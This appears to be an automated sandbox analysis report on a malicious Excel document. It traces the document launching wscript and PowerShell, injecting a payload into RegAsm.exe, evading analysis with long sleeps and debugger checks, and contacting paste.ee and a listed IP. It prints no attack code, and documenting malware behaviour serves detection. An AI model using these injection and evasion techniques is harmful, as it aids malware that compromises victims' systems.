            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: Ref19920830281982938RT.xls Stream path 'Workbook' entropy: 7.99843135762 (max. 8.0)
            Source: FE430000.0.dr Stream path 'Workbook' entropy: 7.99840684995 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040F7A7 Sleep,ExitProcess, 17_2_0040F7A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 17_2_0041A748
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 491
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1920
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1480
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8365
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3528
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 482
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9303
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: foregroundWindowGot 1687
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3320 Thread sleep time: -300000s >= -30000s
            Source: C:\Windows\SysWOW64\wscript.exe TID: 3444 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3536 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640 Thread sleep count: 1480 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640 Thread sleep count: 8365 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684 Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684 Thread sleep time: -1200000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep count: 3528 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep count: 482 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3948 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4000 Thread sleep count: 176 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4000 Thread sleep time: -88000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep count: 237 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep time: -711000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4080 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep count: 9303 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep time: -27909000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 17_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0044E879 FindFirstFileExA, 17_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040783C FindFirstFileW,FindNextFileW, 17_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 17_2_00407C97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node graph_17-49199
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 17_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h] 17_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00412077 GetProcessHeap,HeapFree, 17_2_00412077
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00434B47 SetUnhandledExceptionFilter, 17_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 188.114.97.3 443
            Source: C:\Windows\SysWOW64\wscript.exe Domain query: paste.ee
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3508, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 17_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00419627 mouse_event, 17_2_00419627
